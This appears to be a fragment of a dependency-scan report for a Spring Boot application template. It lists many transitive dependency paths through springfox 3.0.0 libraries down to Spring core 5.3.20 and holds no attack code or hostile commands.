  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
